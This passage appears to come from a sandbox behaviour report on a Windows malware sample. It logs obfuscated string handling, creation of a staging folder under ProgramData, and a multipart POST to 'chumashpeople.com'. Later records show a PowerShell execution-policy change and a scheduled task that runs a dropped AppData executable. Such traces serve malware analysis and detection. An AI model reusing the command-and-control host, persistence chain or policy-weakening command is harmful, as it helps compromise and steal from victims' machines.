(uFlags=0x40, uBytes=0x10) returned 0x375960 [0137.995] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0137.995] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0137.995] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0137.995] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0137.995] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0137.995] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0137.995] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0137.995] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0137.995] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0137.996] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0137.996] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0137.996] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0137.996] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0137.996] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0137.996] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0137.996] LocalAlloc (uFlags=0x40, uBytes=0x4b) returned 0x374a98 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.996] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.997] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.998] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.998] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.998] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.998] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.998] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.998] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.998] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.998] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.998] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.998] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.998] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.998] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.998] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.998] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.998] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.998] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.998] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.998] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.998] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0137.998] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x375978 [0137.998] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0137.998] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0137.998] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0137.998] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0137.998] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0137.998] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0137.998] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0137.998] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0137.998] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0137.998] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0137.998] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0137.999] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0137.999] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x375990 [0137.999] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0137.999] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0137.999] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0137.999] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0137.999] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0137.999] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0137.999] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0137.999] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0137.999] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0137.999] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0138.585] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18eea4 | out: lpSystemTimeAsFileTime=0x18eea4*(dwLowDateTime=0xc70d1c30, dwHighDateTime=0x1d62438)) [0138.585] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x2) returned 0x2f12b8 [0138.585] GetTickCount () returned 0x1156681 [0138.585] GetLastError () returned 0x0 [0138.585] CreateDirectoryA (lpPathName="C:\\ProgramData\\E6P3CMJ7GO09UGAW4TCHZY4YL" (normalized: "c:\\programdata\\e6p3cmj7go09ugaw4tchzy4yl"), lpSecurityAttributes=0x0) returned 1 [0138.586] SetCurrentDirectoryA (lpPathName="C:\\ProgramData\\E6P3CMJ7GO09UGAW4TCHZY4YL" (normalized: "c:\\programdata\\e6p3cmj7go09ugaw4tchzy4yl")) returned 1 [0138.586] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x30) returned 0x2f12f0 [0138.587] CreateDirectoryA (lpPathName="C:\\ProgramData\\E6P3CMJ7GO09UGAW4TCHZY4YL\\files" (normalized: "c:\\programdata\\e6p3cmj7go09ugaw4tchzy4yl\\files"), lpSecurityAttributes=0x0) returned 1 [0138.587] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f12f0 | out: hHeap=0x2f0000) returned 1 [0138.587] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x7a120) returned 0x2ed0048 [0138.595] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x376058 [0138.595] lstrlenA (lpString="LLQ96IVWW5UW9HTHN") returned 17 [0138.595] lstrlenA (lpString="LLQ96IVWW5UW9HTHN") returned 17 [0138.595] lstrlenA (lpString="LLQ96IVWW5UW9HTHN") returned 17 [0138.595] lstrlenA (lpString="LLQ96IVWW5UW9HTHN") returned 17 [0138.595] lstrlenA (lpString="LLQ96IVWW5UW9HTHN") returned 17 [0138.595] lstrlenA (lpString="LLQ96IVWW5UW9HTHN") returned 17 [0138.595] lstrlenA (lpString="LLQ96IVWW5UW9HTHN") returned 17 [0138.595] lstrlenA (lpString="LLQ96IVWW5UW9HTHN") returned 17 [0138.595] lstrlenA (lpString="LLQ96IVWW5UW9HTHN") returned 17 [0138.595] lstrlenA (lpString="LLQ96IVWW5UW9HTHN") returned 17 [0138.595] lstrlenA (lpString="LLQ96IVWW5UW9HTHN") returned 17 [0138.595] lstrlenA (lpString="LLQ96IVWW5UW9HTHN") returned 17 [0138.595] lstrlenA (lpString="LLQ96IVWW5UW9HTHN") returned 17 [0138.595] lstrlenA (lpString="LLQ96IVWW5UW9HTHN") returned 17 [0138.595] lstrlenA (lpString="LLQ96IVWW5UW9HTHN") returned 17 [0138.595] lstrlenA (lpString="LLQ96IVWW5UW9HTHN") returned 17 [0138.595] lstrlenA (lpString="LLQ96IVWW5UW9HTHN") returned 17 [0138.595] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x20) returned 0x2f12f0 [0138.595] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x20) returned 0x2f1318 [0138.595] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x20) returned 0x2f1340 [0138.595] GetLastError () returned 0x0 [0138.596] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0138.744] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x18ed60, dwBufferLength=0x4) returned 1 [0138.744] InternetConnectA (hInternet=0xcc0004, lpszServerName="chumashpeople.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0138.744] InternetSetOptionA (hInternet=0xcc0008, dwOption=0x41, lpBuffer=0x1, dwBufferLength=0x0) returned 0 [0138.744] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/517", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0138.746] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x80) returned 0x2f1368 [0138.746] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0138.746] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0138.746] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0138.746] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0138.746] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f1368 | out: hHeap=0x2f0000) returned 1 [0138.746] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x30) returned 0x2f1368 [0138.746] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x47) returned 0x2f13a0 [0138.746] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f1368 | out: hHeap=0x2f0000) returned 1 [0138.746] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A", dwHeadersLength=0x3f, dwModifiers=0x20000000) returned 1 [0138.746] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Content-Length: 25", dwHeadersLength=0x12, dwModifiers=0x20000000) returned 1 [0138.746] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x2ed0048*, dwOptionalLength=0x19) Thread: id = 102 os_tid = 0x6d8 Thread: id = 103 os_tid = 0x818 Thread: id = 104 os_tid = 0x828 Thread: id = 106 os_tid = 0x570 Thread: id = 107 os_tid = 0x484 Process: id = "11" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x3bb24000" os_pid = "0x728" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xbf4" cmd_line = "powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 97 os_tid = 0x6b0 Process: id = "12" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x3a497000" os_pid = "0x7b8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x370" cmd_line = "taskeng.exe {31A8B898-6208-4358-B6B1-3105AEB20C1A} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 99 os_tid = 0x90c Thread: id = 100 os_tid = 0x7fc Thread: id = 101 os_tid = 0x9a4 Thread: id = 105 os_tid = 0x55c Thread: id = 108 os_tid = 0x7a0 Thread: id = 109 os_tid = 0x6ec Thread: id = 110 os_tid = 0x674 Process: id = "13" image_name = "585939.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\\585939.exe" page_root = "0x3a3a5000" os_pid = "0x418" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x7b8" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\\585939.exe\" --Task" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 111 os_tid = 0x1c0